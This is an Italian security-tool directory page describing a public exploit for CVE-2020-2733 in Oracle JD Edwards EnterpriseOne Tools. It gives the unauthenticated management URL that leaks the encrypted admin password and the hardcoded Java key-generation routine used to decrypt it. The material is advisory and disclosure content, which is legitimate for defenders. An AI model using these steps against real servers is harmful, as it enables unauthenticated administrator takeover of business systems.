Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2020-2733 — Exploit per CVE-2020-2733 in JD Edwards EnterpriseOne Tools, che dimostra la decrittazione non autenticata della password admin e il bypass dell'autenticazione per ottenere diritti di amministratore. | Kitploit
Strumenti/GitHubGitHub/anmolksachan/cve-2020-2733
Strumenti di Crittografia/DecrittografiaAttacchi alle PasswordAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebRaccolta InformazioniPenetration TestingConfigurazione Errata
GitHubanmolksachan/cve-2020-2733

CVE-2020-2733

Exploit per CVE-2020-2733 in JD Edwards EnterpriseOne Tools, che dimostra la decrittazione non autenticata della password admin e il bypass dell'autenticazione per ottenere diritti di amministratore.

122 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository

CVE-2020-2733 - La password di amministrazione di JD Edwards EnterpriseOne Tools non è adeguatamente protetta

image
Immagine 1: Decifra la stringa
image
Immagine 2: Decifra fornendo l'URL

[CVE-2020-2733]

Applicazione: JD Edwards EnterpriseOne Tools
Versioni affette: JD Edwards EnterpriseOne Tools 9.2
URL del fornitore: https://oracle.com/
Bug: Divulgazione di informazioni
Segnalato: 18 settembre 2019
Data dell'avviso pubblico: 23 agosto 2022
Riferimento: [https://www.oracle.com/security-alerts/cpuapr2020.html, https://redrays.io/cve-2020-2733-jd-edwards/]
Modello Nuclei per il rilevamento: https://github.com/projectdiscovery/nuclei-templates/blob/68f0ad5fa2f54a08959e2d68633174750fcb4952/http/cves/2020/CVE-2020-2733.yaml#L2

Descrizione

INFORMAZIONI DELL'AVVISO
Titolo: [CVE-2020-2733] La password di amministrazione di JD Edwards EnterpriseOne Tools non è adeguatamente protetta
Rischio: Critico
URL dell'avviso: https://redrays.io/cve-2020-6369-patch-bypass/
Data di pubblicazione: 23.08.2022

INFORMAZIONI SULLA VULNERABILITÀ


Sfruttabile da remoto: Sì
Sfruttabile localmente: No


Informazioni CVSS: Punteggio base CVSS v3.1: 9.8 / 10 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

DESCRIZIONE DELLA VULNERABILITÀ

JD Edwards EnterpriseOne Tools 9.2 o versioni inferiori consentono ad attaccanti non autenticati di aggirare l'autenticazione e ottenere diritti di amministratore sul sistema.

DESCRIZIONE TECNICA

La vulnerabilità è stata scoperta nel portale di gestione Oracle JD Edwards. Per riprodurre la vulnerabilità, è necessario aprire (senza autenticazione) il seguente URL

http://JDEdwards:8999/manage/fileDownloader?sec=1

Quando si apre l'URL, è possibile vedere un testo pseudo-casuale nella pagina. unnamed-2-e1661254647723

root@kitploit:~
ACHCJKGJHCJKBLLALOLOJFCABEFHOALDDAOFNGGANPDB


Dopo aver analizzato i file jar di JD Edwards, abbiamo scoperto che questi dati pseudo-casuali sono – LA PASSWORD ADMIN CIFRATA!

Le chiavi di cifratura si trovano nella seguente funzione

root@kitploit:~
private static void genKeys(byte[] paramArrayOfByte1, byte[] paramArrayOfByte2, byte paramByte)
{
int i = 0;
byte[] arrayOfByte1 = { 65, 4, 95, 12, 88, 41, 6, 114, 119, 93, 37, 68, 75, 19, 49, 46 };
byte[] arrayOfByte2 = { 107, 34, 26, 94, 68, 41, 119, 48, 3, 88, 28, 97, 5, Byte.MAX_VALUE, 77, 54 };
byte[] arrayOfByte3 = { 36, 89, 113, 109, 38, 15, 7, 66, 76, 115, 16, 53, 106, 94, 27, 56 };
int j = paramByte >> 4;
int k = paramByte & 0xF;
int m = arrayOfByte3[j];
for (i = 0; i < 16; i++) {
paramArrayOfByte1[i] = ((byte)(arrayOfByte1[i] ^ m));
}
m = arrayOfByte3[k];
for (i = 0; i < 16; i++) {
paramArrayOfByte2[i] = ((byte)(arrayOfByte2[i] ^ m));
}
}

Di conseguenza, otterrai una password di amministrazione e potrai distribuire qualsiasi applicazione nel portale JD Edwards. immagine

Riferimento/ Crediti: https://redrays.io/blog/cve-2020-2733-jd-edwards/

Scarica lo strumento